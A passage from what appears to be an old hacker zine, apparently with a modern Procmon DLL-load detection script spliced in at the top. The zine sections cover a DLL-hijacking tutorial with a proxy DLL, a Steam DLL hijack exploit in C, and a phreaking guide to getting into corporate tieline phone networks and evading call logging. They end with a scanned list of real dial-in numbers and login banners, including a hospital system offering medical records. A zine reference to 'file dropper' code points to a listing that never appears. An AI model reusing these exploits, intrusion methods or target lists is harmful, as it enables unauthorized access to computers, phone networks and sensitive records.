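    opened earlier in the trace: the legitimate copy that a search-order hijack would shadow.
    """
    opened_in = defaultdict(list)  # (process, dll name) -> trusted dirs where CreateFile succeeded
    findings = []
    for proc, op, path, result in parse_procmon_csv(text):
        directory, name = split_path(path)
        if not name.endswith(".dll"):
            continue
        key = (proc, name)
        if op == "CreateFile" and result == "SUCCESS" and is_trusted(path, extra_roots):
            if directory not in opened_in[key]:
                opened_in[key].append(directory)
        elif op == "Load Image" and result == "SUCCESS" and not is_trusted(path, extra_roots):
            findings.append({
                "process": proc,
                "dll": name,
                "loaded_from": path,
                "trusted_copies": list(opened_in[key]),
            })
    return findings


if __name__ == "__main__":
    for finding in find_untrusted_loads(SAMPLE_CSV):
        shadowed = ", ".join(finding["trusted_copies"]) or "none seen in trace"
        print(f'{finding["process"]}: {finding["dll"]} mapped from {finding["loaded_from"]} '
              f"(trusted copy: {shadowed})")
```

A load from a user-writable folder that shadows a copy under Program Files is the pattern to investigate; the same logic applies to Sysmon image-load events once their fields are mapped to the four columns used here.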
"Autorun DLL Hijacker (USB stick)" at [8] attempts to compromise a system through the AutoRun
feature of USB thumb drives.

On another note, we only covered creating proof of concept DLLs that don't really do much. Also,
since we are either removing the functionality of the export functions or the actual export
functions themselves, the hijacked program is going to crash if we remove the "exit(0);" line.
Let's learn how to execute our payload while still maintaining the functionality of the original
DLL file, effectively creating a silent attack. We will achieve this through the use of a "proxy
DLL."

A proxy DLL is exactly what it sounds like - a DLL file that acts as an intermediary to another DLL
file. These are used to intercept and alter program calls, most commonly to add "extra
functionality" to games. For this quick section, I'll be referencing the article [9] as our method
of creating proxy DLL files. The source wrappit.cpp [10] is provided by the article to automate the
process, which you can instead download from [11] to avoid the mandatory registration bullshit.

As I am still unfamiliar with the true power of proxy DLLs, I will only introduce you to this
concept and recommend you to guide yourself through the process by reading the documentation linked
above. The CodeProject article does a pretty good job explaining how to use the tool. Make sure that
the appropriate development environment is installed (I am using Microsoft Visual C++ Express). I
will use the example wsock32.dll as in the article:

C:\Users\storm\Desktop\src>"C:\Program Files\Microsoft Visual Studio 10.0\VC\bin\vcvars32.bat"
Setting environment for using Microsoft Visual Studio 2010 x86 tools.

C:\Users\storm\Desktop\src>dumpbin /exports C:\Windows\System32\wsock32.dll > exports.txt

C:\Users\storm\Desktop\src>type exports.txt
Microsoft (R) COFF/PE Dumper Version 10.00.30319.01
Copyright (C) Microsoft Corporation.  All rights reserved.

Dump of file C:\Windows\System32\wsock32.dll

File Type: DLL

  Section contains the following exports for WSOCK32.dll

    00000000 characteristics
    4A5BC955 time date stamp Mon Jul 13 19:55:01 2009
        0.00 version
           1 ordinal base
        1142 number of functions
          75 number of names

    ordinal hint RVA      name

       1141    0          AcceptEx (forwarded to MSWSOCK.AcceptEx)
       1111    1          EnumProtocolsA (forwarded to MSWSOCK.EnumProtocolsA)
       1112    2          EnumProtocolsW (forwarded to MSWSOCK.EnumProtocolsW)
       1142    3          GetAcceptExSockaddrs (forwarded to MSWSOCK.GetAcceptExSockaddrs)
       1109    4          GetAddressByNameA (forwarded to MSWSOCK.GetAddressByNameA)
       1110    5          GetAddressByNameW (forwarded to MSWSOCK.GetAddressByNameW)
       1115    6          GetNameByTypeA (forwarded to MSWSOCK.GetNameByTypeA)
       1116    7          GetNameByTypeW (forwarded to MSWSOCK.GetNameByTypeW)
       1119    8          GetServiceA (forwarded to MSWSOCK.GetServiceA)
       1120    9          GetServiceW (forwarded to MSWSOCK.GetServiceW)
       1113    A          GetTypeByNameA (forwarded to MSWSOCK.GetTypeByNameA)
       1114    B          GetTypeByNameW (forwarded to MSWSOCK.GetTypeByNameW)
         24    C          MigrateWinsockConfiguration (forwarded to MSWSOCK.MigrateWinsockConfiguration)
       1130    D          NPLoadNameSpaces (forwarded to MSWSOCK.NPLoadNameSpaces)
       1117    E          SetServiceA (forwarded to MSWSOCK.SetServiceA)
       1118    F          SetServiceW (forwarded to MSWSOCK.SetServiceW)
       1140   10          TransmitFile (forwarded to MSWSOCK.TransmitFile)
        500   11          WEP (forwarded to ws2_32.WEP)
        102   12          WSAAsyncGetHostByAddr (forwarded to ws2_32.WSAAsyncGetHostByAddr)
        103   13          WSAAsyncGetHostByName (forwarded to ws2_32.WSAAsyncGetHostByName)
        105   14          WSAAsyncGetProtoByName (forwarded to ws2_32.WSAAsyncGetProtoByName)
        104   15          WSAAsyncGetProtoByNumber (forwarded to ws2_32.WSAAsyncGetProtoByNumber)
        107   16          WSAAsyncGetServByName (forwarded to ws2_32.WSAAsyncGetServByName)
        106   17          WSAAsyncGetServByPort (forwarded to ws2_32.WSAAsyncGetServByPort)
        101   18          WSAAsyncSelect (forwarded to ws2_32.WSAAsyncSelect)
        108   19          WSACancelAsyncRequest (forwarded to ws2_32.WSACancelAsyncRequest)
        113   1A          WSACancelBlockingCall (forwarded to ws2_32.WSACancelBlockingCall)
        116   1B          WSACleanup (forwarded to ws2_32.WSACleanup)
        111   1C          WSAGetLastError (forwarded to ws2_32.WSAGetLastError)
        114   1D          WSAIsBlocking (forwarded to ws2_32.WSAIsBlocking)
       1107   1E          WSARecvEx (forwarded to MSWSOCK.WSARecvEx)
        109   1F          WSASetBlockingHook (forwarded to ws2_32.WSASetBlockingHook)
        112   20          WSASetLastError (forwarded to ws2_32.WSASetLastError)
        115   21          WSAStartup (forwarded to ws2_32.WSAStartup)
        110   22          WSAUnhookBlockingHook (forwarded to ws2_32.WSAUnhookBlockingHook)
       1000   23          WSApSetPostRoutine (forwarded to ws2_32.WSApSetPostRoutine)
        151   24          __WSAFDIsSet (forwarded to ws2_32.__WSAFDIsSet)
          1   25          accept (forwarded to ws2_32.accept)
          2   26          bind (forwarded to ws2_32.bind)
          3   27          closesocket (forwarded to ws2_32.closesocket)
          4   28          connect (forwarded to ws2_32.connect)
       1106   29          dn_expand (forwarded to MSWSOCK.dn_expand)
         51   2A          gethostbyaddr (forwarded to ws2_32.gethostbyaddr)
         52   2B          gethostbyname (forwarded to ws2_32.gethostbyname)
         57   2C          gethostname (forwarded to ws2_32.gethostname)
       1101   2D          getnetbyname (forwarded to MSWSOCK.getnetbyname)
          5   2E          getpeername (forwarded to ws2_32.getpeername)
         53   2F          getprotobyname (forwarded to ws2_32.getprotobyname)
         54   30          getprotobynumber (forwarded to ws2_32.getprotobynumber)
         55   31          getservbyname (forwarded to ws2_32.getservbyname)
         56   32          getservbyport (forwarded to ws2_32.getservbyport)
          6   33          getsockname (forwarded to ws2_32.getsockname)
          7   34 0000186E getsockopt
          8   35          htonl (forwarded to ws2_32.htonl)
          9   36          htons (forwarded to ws2_32.htons)
         10   37          inet_addr (forwarded to ws2_32.inet_addr)
       1100   38          inet_network (forwarded to MSWSOCK.inet_network)
         11   39          inet_ntoa (forwarded to ws2_32.inet_ntoa)
         12   3A          ioctlsocket (forwarded to ws2_32.ioctlsocket)
         13   3B          listen (forwarded to ws2_32.listen)
         14   3C          ntohl (forwarded to ws2_32.ntohl)
         15   3D          ntohs (forwarded to ws2_32.ntohs)
       1102   3E          rcmd (forwarded to MSWSOCK.rcmd)
         16   3F 000017A8 recv
         17   40 00001808 recvfrom
       1103   41          rexec (forwarded to MSWSOCK.rexec)
       1104   42          rresvport (forwarded to MSWSOCK.rresvport)
       1108   43          s_perror (forwarded to MSWSOCK.s_perror)
         18   44          select (forwarded to ws2_32.select)
         19   45          send (forwarded to ws2_32.send)
         20   46          sendto (forwarded to ws2_32.sendto)
       1105   47          sethostname (forwarded to MSWSOCK.sethostname)
         21   48 000018E0 setsockopt
         22   49          shutdown (forwarded to ws2_32.shutdown)
         23   4A          socket (forwarded to ws2_32.socket)

  Summary

        1000 .data
        1000 .reloc
        1000 .rsrc
        3000 .text

C:\Users\storm\Desktop\src>g++ wrappit.cpp -o wrappit.exe

C:\Users\storm\Desktop\src>wrappit.exe wsock32.dll exports.txt __stdcall C:\\Windows\\System32\\wsock32.dll wsock32.cpp wsock32.def
Wrappit. Copyright (C) Chourdakis Michael
Usage: WRAPPIT

==================================================================
Step 1: Parsing exports.txt...
Step 1: 75 exported functions parsed.
------------------------------------------
Step 2: Generating .DEF file wsock32.def...
Step 2: 75 exported functions written to DEF.
------------------------------------------
Step 3: Generating .CPP file wsock32.cpp...
cl : Command line warning D9035 : option 'Wp64' has been deprecated and will be removed in a future release
wsock32.cpp
   Creating library wsock32.lib and object wsock32.exp
Generating code
Finished generating code

C:\Users\storm\Desktop\src>

And this is where I will leave you. :)

VI. Omg Hax
===========

Many flaws in web browsers allow files to be downloaded to a victim's computer but not executed
(arbitrary file download), leaving the attacker hoping that it's opened either intentionally or
accidentally. With DLL hijacking, exploits such as these do not have to rely on a user directly
interacting with the file, which usually leads to exposure of an attack. Instead, a malicious DLL
file targeting a popular program may be dropped to a location that will be searched before the
actual, legitimate DLL is found.
Or, in a case like this, where the actual DLL is missing altogether:

/*
Exploit Title: Steam DLL Hijacking Exploit (steamgamesupport.dll)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Tested on: Windows Vista SP2
http://www.gonullyourself.org/

gcc -shared -o steamgamesupport.dll Steam-DLL.c

For whatever ungodly reason, Steam searches PATH for steamgamesupport.dll but never finds it.
Shall we help it?
*/

#include <windows.h>
#include <stdlib.h>   /* exit() */

/* Proof-of-concept payload: launch Calculator, then end the host process. */
int hax()
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    hax();
    return 0;
}

The following code, provided by SubSyn, acts as a basic example of a file dropper. It will produce
one script warning when executed. The code with no script warnings will remain unreleased. :)

[1] http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx
[2] http://msdn.microsoft.com/en-us/library/ms682583%28VS.85%29.aspx
[3] http://www.nirsoft.net/utils/dll_export_viewer.html
[4] http://blog.metasploit.com/2010/08/better-faster-stronger.html
[5] http://digitalacropolis.us/?p=113
[6] http://www.exploit-db.com/papers/14813/
[7] http://www.attackvector.org/new-dll-hijacking-exploits-many/
[8] http://www.attackvector.org/autorun-dll-hijacker-usb-stick/
[9] http://www.codeproject.com/KB/DLL/CreateYourProxyDLLs.aspx
[10] http://www.codeproject.com/KB/DLL/CreateYourProxyDLLs/src.zip
[11] http://gonullyourself.org/downloads/wrappit.cpp
[12] http://support.microsoft.com/kb/815065
[13] http://www.network-theory.co.uk/docs/gccintro/gccintro_25.html
[14] http://kb.iu.edu/data/akqn.html
[15] http://support.microsoft.com/kb/2389418
[16] http://www.microsoft.com/technet/security/advisory/2269637.mspx
[17] http://support.microsoft.com/kb/2264107
[18] http://www.cs.ucdavis.edu/research/tech-reports/2010/CSE-2010-2.pdf
[19] http://blog.acrossecurity.com/2010/09/binary-planting-goes-exe.html
[20] http://msdn.microsoft.com/en-us/library/ms682425%28VS.85%29.aspx
[21] http://msdn.microsoft.com/en-us/library/ms687393%28VS.85%29.aspx
[22] http://msdn.microsoft.com/en-us/library/ms684183%28VS.85%29.aspx
[23] http://msdn.microsoft.com/en-us/library/20y988d2%28v=VS.80%29.aspx
[24] http://msdn.microsoft.com/en-us/library/431x4c1w%28VS.80%29.aspx

[==================================================================================================]

-=[ 0x07 Numbers Stations FOIA Request
-=[ Author: teh crew

For those who are not familiar with numbers stations:

"Numbers stations (or number stations) are shortwave radio stations of uncertain origin. They
generally broadcast artificially generated voices reading streams of numbers, words, letters
(sometimes using a spelling alphabet), tunes or Morse code. They are in a wide variety of languages
and the voices are usually female, though sometimes male or children's voices are used.

Evidence supports popular assumptions that the broadcasts are used to send messages to spies. This
usage has not been publicly acknowledged by any government that may operate a numbers station, but
in 2001, the United States tried the Cuban Five for spying for Cuba. The group had received and
decoded messages that had been broadcast from a Cuban numbers station.[1] Also in 2001, Ana Belen
Montes, a senior US Defense Intelligence Agency analyst, was arrested and charged with espionage.
The federal prosecutors stated: "Montes communicated with the Cuban Intelligence Service through
encrypted messages and received her instructions through encrypted shortwave transmissions from
Cuba". In 2006, Carlos Alvarez and his wife Elsa Alvarez were arrested and charged with espionage.
The U.S. District Court Florida stated: "defendants would receive assignments via shortwave radio
transmissions".
In June 2009, the United States similarly charged Walter Kendall Myers with conspiracy to spy for
Cuba and receiving and decoding messages broadcast from a numbers station operated by the Cuban
Intelligence Service to further that conspiracy.[2][3]

It has been reported that the United States uses numbers stations to communicate encoded
information to persons in other countries.[1]

Numbers stations appear and disappear over time (although some follow regular schedules), and their
overall activity has increased slightly since the early 1990s. This increase suggests that, as
spy-related phenomena, they were not unique to the Cold War."

- http://en.wikipedia.org/wiki/Numbers_station

"A search of Commission records located a number of documents concerning "the operation of domestic
and foreign numbers stations." No records were found, however, with respect to the decoding of the
messages that numbers stations broadcast. The records responsive to your request must be withheld
under FOIA Exemption 7(E), 5 U.S.C. § 552(b)(7)(E); see 47 C.F.R. § 0.457(g)(5), which permits us to
withhold records where release would "disclose techniques and procedures for law enforcement
investigations or prosecutions, or would disclose guidelines for law enforcement investigations or
prosecutions if such disclosure could reasonably be expected to risk circumvention of the law[.]"

We have also reviewed the records to determine if any parts may be released and concluded no
portions of the records may be segregated and released. See 5 U.S.C. § 552(b) (sentence immediately
following exemptions); Memorandum for Heads of Executive Departments and Agencies, Freedom of
Information Act, 74 FR 4683 (2009) (President Obama's memorandum concerning the FOIA); Memorandum
for Heads of Executive Departments and Agencies, Freedom of Information Act,
http://www.usdoj.gov/ag/foia-memo-march2009.pdf, (Attorney General Holder's FOIA Memo)."
When we spoke to an attorney at the FOIA office over the phone, he requested a 30-day extension due
to the sheer amount of information uncovered. Interesting....

The government won't even release redacted documents on the topic. Not to worry; we're working on
it. More to come.

[==================================================================================================]

-=[ 0x08 Exploring Tieline Networks
-=[ Author: Shadytel, Inc
-=[ Website: http://www.shadytel.com/

Anybody who hasn't been living under a rock is familiar with PBXes - the smaller, more compact
business phone systems we know and love (particularly all you shady folks who need an easy way to
conceal ANI). While PBX manufacturers learned over a decade ago that prohibiting a blind transfer to
9+anything is an easy way to put an end to this mischief, the digit 8 is a completely different
story. 8 will often give you a second dialtone, but a very different one.

Long distance for businesses has never been cheap for anyone, not even the providers. Extra
"because we can" fees aside, businesses use far too many minutes to make an unlimited plan
profitable for all but the dodgiest carriers. That's where tielines come in. Sometimes, it makes
more sense to make your own network if most of your calls are between different branches. Not only
do the calls only cost whatever it takes to keep the equipment running, but you can make the
dialplan whatever the hell you like. Rather than having separate digits for tieline/PSTN outdial, a
company could have the PBX catch 1-700-222-xxxx and assign different stores their extensions based
on the store ID.

Eventually, long distance companies started realizing that everybody liked the idea of a tieline,
but nobody liked the idea of laying cable or provisioning switches.
For this reason, most of what you'll find will end up going over a conventional long distance
carrier anyway (with special pricing arrangements), but depending on where you look, what you'll
find will end up being very different. On one end of the spectrum is Macy's and their shiny new IP
tieline network (or more accurately, a Sprint corporate account dubbed the Federated Tieline
Network). This baby features interactive "not in service" messages, voice directories, and Rolm
PBXes. On the other end is the Dominion tieline network. Dominion's network, before being sold to
Cavalier Telephone, was completely homemade. The fiber spanning from New York well into the dirty
South was in-house, the switches were in-house, and the ancient, sometimes not even digital PBXes
mostly interconnected by 4-wire analog trunks to the PSTN are most definitely still alive, kicking,
and retrofitted with equally ancient voicemail systems; mostly either Siemens, or pre-Avaya Octel.
In a twist of bitter irony, the Dominion network sounds consistently better.

Getting in
-----------

If you've ever spent more than two minutes scanning, playing with some doohickey you found on the
network, or otherwise, well, anything, you probably know how hard it is to stick to a plan. You can
never predict security flaws or outright generosity. The tieline world is pretty much the same.
Unless you're absolutely sure whichever PBX stands between you and a tieline is vulnerable, you'll
be a lot better off poking across multiple businesses than just pounding your head against one.
While it isn't always absolute, keep in mind that large corporate customers aren't just big users of
tielines - they're also big fans of standardized software/hardware configuration. If you find one,
you can most certainly find them all, but if you're not having any luck with two or three PBXes
owned by the same company, it's a safe bet that you'll have a far more rewarding experience with
something else.
Be sure, though, that any of this is even necessary. Companies like IBM leave their tieline open to
anyone. Whenever you transfer to someone in the company, the IVR gives you the option of
transferring to a tieline extension instead.

Asking nicely
-------------

Before even trying to pull leet hax on your local PBX, try it! If it's worked for people getting
onto store PA systems for over 15 years, it can most definitely work for you. As compelling as the
word "please" can be, knowing what they actually call the tieline is a hundred times more
compelling. Every company we've encountered so far will refer to a tieline on the 8 level as
'tieline 8', but if you're not sure, you can always snag yourself an extension card. Failing that,
even a Google search will go a long way. For example, "tieline 8" +IBM (with quotes) will find you
emails from IBM employees giving their 7-digit tieline extensions for contact.
Macy's/Bloomingdale's/other companies under the same corporate umbrella refer to their tieline as
Fednet (no obvious relation to efNet, but we suspect otherwise) and have a full ten-digit dialing
plan.

Blind Transfer
--------------

As the name implies, a blind transfer is an operation done by an IVR where it'll just flash over,
give the PBX an extension, and with absolutely no checking at all will drop out, leaving you to
whatever illicit goodies you're about to obtain. As we established earlier, PBX manufacturers have
taken care to ensure the one thing that's guaranteed to piss off their customers won't happen, but
it's otherwise wide open.

Conference calls
----------------

Corporate conference calls will more often than not have a tieline extension to avoid busying out
their PSTN lines (while saving money in the process). Fortunately for us, a number of these are
extra special conference circuits with dialout capabilities. While finding these is an effort we
leave to the reader (they're real though, we swear!), imagine the benefits.
How cool would it be to gather all your leet phreakz0r buddies onto a private long distance network?
Especially if a long distance security department is "service observing" one of your friends on a
conference call.

Physical Access
---------------

It sounds stupid, but if you need to place one call or want to verify something before going
through the trouble of gaining remote access, it's a good idea. Most large stores have a number of
unattended phones. Target even encourages you to use them if you need assistance. A number of
Macy's stores will have courtesy phones with tieline access in the dressing room areas. Just
remember that you're not the first person to do shady things near a dressing room, and there is a
camera pointing straight at you. This means plugging your computer into the phone line will trigger
a security guard to magically appear.

Let's say this particular Macy's - or any other store you may happen to be at - doesn't have a
courtesy phone, and all you have to work with is a phone with a hotline arrangement. In most
Macy's, this is pretty popular. There'll be phones in an out-of-the-way location, usually near an
elevator, marked with something like "Pick up to be connected to the Macy's credit line"
specifically for customers to use. Depending on the store configuration, you'll see either a Rolm
PBX phone with a magnetic (no visible) hookswitch, or a Western Electric 2554 clone. Either way,
when you pick up the phone, you'll be greeted with several seconds of silence, and finally, an IVR
with some horrible CELP codec:

"Hello, and thank you for calling the Macys credit line! If you think Shadytel is great, press one.
Otherwise, please record all your personal information after the tone, and a representative will
reimburse your card with advertising revenue."

If you're on a 2554 clone: Just flash and you'll be greeted with dialtone!

If you're on a Rolm PBX phone: Look near the bottom for three line buttons.
If they're not labeled, either making an attempt to transfer (right-most button), or pressing
connect (center) will get you a PBX dialtone.

For the most part, these phones seem to not have any restrictions. Tieline access is unrestricted,
but dialout is a little perplexing. From the stores we've tried it from, you can simply dial 800
numbers as 9+, and they'll go through without a problem. Local calls seem to be another story. The
PBX will wait for a few moments, presumably for extra digits, and then give you its version of
reorder.

DISA
----

DISA, or Direct Inward System Access, is a PBX function usually only found on larger systems, both
new and old. Fortunately for us, the companies that have PBX DISAs are also the very same ones who
have tielines! So acronyms aside, a DISA is like an extender. Imagine being in the headquarters of
Megacorp USA and finding a courtesy phone in their lobby, but being able to be at that phone from
anywhere in the world by dialing a phone number. Well, are you going to let a phone that the general
public uses have unrestricted access to the network? Of course not - that phone is going to be
locked down like a maximum security prison.

So, that's pretty much a DISA. Imagine being able to be at that phone from anywhere in the world
simply by dialing a phone number. Only, without the being supervised part. Or the having to be
identifiable part.

Locked down or not, that DISA gives you an advantage. Instead of looking like any other outside
caller, you instead look like someone calling from inside the network. To the employees, the PBX -
EVERYTHING. Except the DISA itself. Depending on the PBX type, it might give you some social
engineering opportunities or access to some interesting vertical service codes, but that still
doesn't solve your problem. Well, it wouldn't just give you the unrestricted ability to access the
rest of the network if you called the DISA from what looks like an inside line, would it?
Yes, some PBX manufacturers (we're looking at you, Avaya!) have some serious explaining to do.

Getting Around
--------------

Sometimes getting around in a tieline dialplan is easy. Like on Fednet, if you dial an invalid
number, an IVR will intercept you and offer you a directory. Sorta like Clippy, only with less urge
to kill it. Other times, it's convoluted, fucked up, and just plain mean. Since the network that's
both the most interesting and the most confusing happens to be the one we're most experienced with,
we'll use the Dominion network as an example.

The moment you or whatever you have doing your evil bidding presses 8, you'll be taken right out of
the office and onto the endless pile of confusion that is a Dominion tieline switch. The very basic
topology of it all (end office/PBX --> tieline switch/tandem --> end office/PBX) is pretty much the
only part of it that makes sense. If you think like us, the first thing you'll think to press is 0.
No matter where you go, 0 always goes to something, no questions asked. Not here. In fact, not even
nothing will happen. The dialtone will just keep on going, but it'll stop accepting digits. Better
get used to it. If you don't respond within seven seconds or so of getting dialtone or start dialing
a prefix the tieline switch doesn't like (555-xxxx will do it), it'll do the exact same thing.

Fear not, though - it's not all bad. If you're trying to search around for a working tieline
exchange, it's pretty easy to tell if you've actually found something or if you're just stumbling
around in the dark. The way exchanges are formatted within the Dominion network is a little like
Russia's PSTN. The exchange itself is a bit like a container for a number of sub-exchanges, but it's
provisioned geographically, a bit like an area code. Every tieline switch knows that Eastern Node
#2, serving northern Virginia, handles the codes 723 and 724, so they'll pass anything within those
two codes to it.
If you dial a non-working sub-exchange in 723/724, you'll get a recording from Eastern Node #2.
Dominion doesn't have it set up like most SS7-enabled networks where the terminating long distance
tandem will send a cause code with a non-working number condition back to the originating long
distance tandem. If you dial a non-working number within 724-39xx, you'll get a recording from
Portsmouth Tech Center #3, the PBX serving that hundred block.

So to recap, it works like this:

Invalid exchange     --> The tieline switch placing your call gives you a recording
Invalid sub-exchange --> The tieline switch placing your call sends it to the tieline switch serving
                         the exchange, which gives you a recording
Invalid extension    --> Wrong number message from the PBX you're trying to call

Figuring out which tieline switch you're sending your calls from is pretty simple. As of this
writing, 425 and 699 are both non-working codes, so anything within either of those two will get you
the recording from your tieline switch.

While we're on the topic of Dominion, here are a few things to keep in mind, should you ever work
your way into their twisted corporate ladder.

- The non-working extension recording for their corporate headquarters tells you to "consult your
  Internet or telephone directory". Do they really mean Internet or intranet?
- If you're calling from the tieline network, it's very possible your call might look exactly like
  a call from within the same building. We've had attendants offer to "come over there and help us".
- There really are some form of at least pseudo-electromechanical switches on the network, like
  724-00xx.
- 736-4636 (or 804-771-4636 via PSTN) is their IT help line.

Benefits
--------

Other than for the fun of exploration, why would you want to gain access to a tieline?
As you're more than likely a residential customer (unless you happen to want ISDN and live
somewhere where it's only tariffed as a business service), why on earth would you need to travel
through a tieline network? With all seriousness, the best answer to this question boils down to two
words: FOR SCIENCE! Like a toy, you probably don't want access to a tieline because it's going to be
of any financial value. You want it because it's fun. The switching equipment that runs a homegrown
tieline network is unlike anything else. The equipment is completely unregulated. You can make a
switch out of mousetraps and put it in your network, or route calls based on some convoluted
numbering scheme that not even Soviet Union dictators can understand.

If you need an even better reason, keep in mind that unregulated means no CALEA. If you want to
re-originate a call from Alaska while lying in your Kaiser Permanente hospital bed, then... well,
dammit, good for you. The network is going to be more than likely unprepared for call log subpoenas
(if it even carries ANI at all). If you want to perform an insane corporate espionage feat, could
you get any more convincing than having slack-jawed Red Thomas call from the Hill Valley drilling
site? Oh, did we mention the DSN is a tieline network?

So let's just put it this way - what you do with a tieline is limited to your resourcefulness.

The end.

[==================================================================================================]

-=[ 0x09 Modem Numbers
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/

The following is a list of modems from various scans posted to the site, along with scans from the
Scan A Day project. The Scan A Day project was conceived on the BinRev forum by samo in late 2008
but unfortunately lost steam about a year later. The project and content archive has since been
handed off to GNY and can be found at http://scanaday.gonullyourself.org/ .
Numbers within this list that were not scanned by me were submitted to GNY or Scan A Day by ThoughtPhreaker, samo, whye, Lucky225, and Decimalz. The CNAM result of each number has also been included. Comments are preceded with #. All connections were made at 1200 baud, 8N1 unless noted otherwise.

If you are interested in dialing some of these numbers, then check out HyperTerminal, a program able to dial out from and interface with modems. You may have a usable modem in your desktop or laptop and not even realize it!

================================================================================
207-324-9906 VERIZON

M857tM857tM857tM857tM857tM857tM857t
================================================================================
212-202-0000, 7E1 New York NY

Welcome to your internet access switch
Unauthorized access is not permitted
Please enter your name and password at the prompt

Login:
================================================================================
212-287-0000 REUTERS AMERICA
# What's with the repeating text?

~ }#�!}!}!} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30Ƚ~~ }#�!}!}"} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30�J~~ }#�!}!}#} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30I�~~ }#�!}!}$} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30}"�~~ }#�!}!}%} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30�}&~~ }#�!}!}&} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30��~~ }#�!}!}'} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30K[~~ }#�!}!}(} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30}5i~~ }#�!}!})} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30��~~ }#�!}!}*} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30�4~~ }#�!}!}+} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30\�~
================================================================================
212-336-0000 WELLPOINT INC
# Television station in New York

WPNY 2.6.11-AV18login:
================================================================================
212-342-0000 NEW YORK PRESBY
# Looks like an access point to a network of universities - this thing is crazy-interesting. The selections I made went to login prompts.

************************************************************************
*                         AUTHORIZED USE ONLY                          *
*  Any use of this system is logged and monitored. Trespassers and     *
*  unauthorized users will be prosecuted to the fullest extent of      *
*  the law. If you are not supposed to be here: Leave Now!             *
************************************************************************

[whitespace]

Server "isdn-pri-gw" Line 73 Terminal-type (unknown)

************************************************************************
*                                                                      *
*                     NYP TERMINAL SERVER AT CUMC                      *
*                     ---------------------------                      *
*                         AUTHORIZED USE ONLY                          *
*                                                                      *
*  Any use of this system is logged and monitored. Trespassers and     *
*  unauthorized users will be prosecuted to the fullest extent of      *
*  the law. If you are not supposed to be here: Leave Now!             *
*                                                                      *
************************************************************************

 1   Laboratory System (CPBX)
 2   Radiology System (CPRAD)
 3   Medical Records (Intellus System) (CPMR)
 4   Pocket Signout Editor (PSE) (WASH)
 5   Columbia University E-Mail System (CUNIX)
 6   ATT Route Server
 7   FLUX (SSH ONLY)
 8   West Campus Mainframe (PHIS)
 9   East Campus Cerner System (JURASSIC)
10   East Campus Cerner System (BRONTO)
11   East Campus Cerner System (STEGO)
12   East Campus TREX System
13   Siemens Eagle System
18   Disconnect

Selection:
================================================================================
212-495-0105 COMPUTERSHARE,G
# Computershare is a data management and financials company.

NYCSCYC1!login:
================================================================================
254-939-4471 BELTON SHPG CTR

U�U�"^�
================================================================================
254-939-4475 CRESTV MANOR NR

~?~?~?~?~?~?~?~?~?~?~��U`By`ٿ�d3Ng�h5�
[whitespace]
@ �Z���G���>�~?�-;=N2�2H�5i�M:k (eU�8�K��L[�i-KzV�i2
================================================================================
254-939-9732 Belton TX

couldn't connect successfully
================================================================================
315-287-9935 NYS DEPT OF COR
# New York State Department of Correctional Services, apparently

[blank, type LOGIN for login]
================================================================================
360-330-0005 QWEST CORP
# Weird ? prompt

?
================================================================================
360-330-0010 QWEST COMM
# Weird ? prompt

?
================================================================================
360-330-0016 QWEST CORP
# Weird ? prompt

?
================================================================================
360-330-0061 Centralia WA

couldn't connect successfully
================================================================================
503-266-1056, 7E1 Canby OR
# Earthquake monitoring station

CONNECT 9600
INVALID USERID
PLEASE ENTER USERID FOR CNBY
<
================================================================================
503-266-1057 Canby OR

[blank]
================================================================================
518-732-2921
# COCOT payphone

NNN
================================================================================
715-386-0020 HUDSON HOCKEY A

[blank]
================================================================================
715-386-0053 Hudson WI
# Weird < prompt

<
================================================================================
715-386-0055 Hudson WI
# Weird < prompt

<
================================================================================
757-430-9920 PAYPHONE

[blank]
================================================================================
757-543-9997 LUCENT TECH
# Perhaps the banner is a serial number? It returns no Google results.

STA06214028 login:
================================================================================
757-865-9922 CORP BLLNG BELL

wFKoff�Ɩ�u2=�R�� X����Uva�R����M�ޅ�I��+��I�����M
================================================================================
775-289-0002 ATT
# Identified by RP as an FDMA radio PBX

COLLINS EXCHANGE RADIO CXR-424

***** MAIN MENU *****

 1. SYSTEM PROVISIONING
 2. RADIO CHANNEL STATUS
 3. SUBSCRIBER LINE STATUS
 4. SUBSCRIBER TERMINAL STATUS
 5. ALARM STATUS
 6. PERFORMANCE REPORTS
 7. DIAGNOSTICS
 8. INSTALLATION
 9. CHANGE PASSWORD
10. LOG OFF

Enter selection number and return key [ ]
================================================================================
775-289-0017 Bell Nevada

couldn't connect successfully
================================================================================
800-226-1337

A�5:J�뎘�l�[Q\� �:IY��g�n�����N�8���2?���P j]F
================================================================================
800-236-2622
# Haha, a dial-up toll-free BBS!

Auto-sensing...

WELCOME!

hpprwhwbbs (#58817025)
Running Worldgroup by GALACTICOMM

ONLINE 9600 BAUD AT 17:19 09-AUG-10

If you already have a User-ID on this system, type it in and press ENTER. Otherwise type "new":
================================================================================
800-456-6855

[blank]
================================================================================
800-468-2622

g������rK� ȃj�������l�Y�|�����y���t�?H���Ŝ��N`
================================================================================
800-507-9935

IrYKFN>~ytv gXYfbU*sL3IYm35I1J|lLU8EUUIdES0wC*4N{[
[whitespace]
iT E
================================================================================
907-849-8888 Venetie AK
# Siemens PBX prompt?

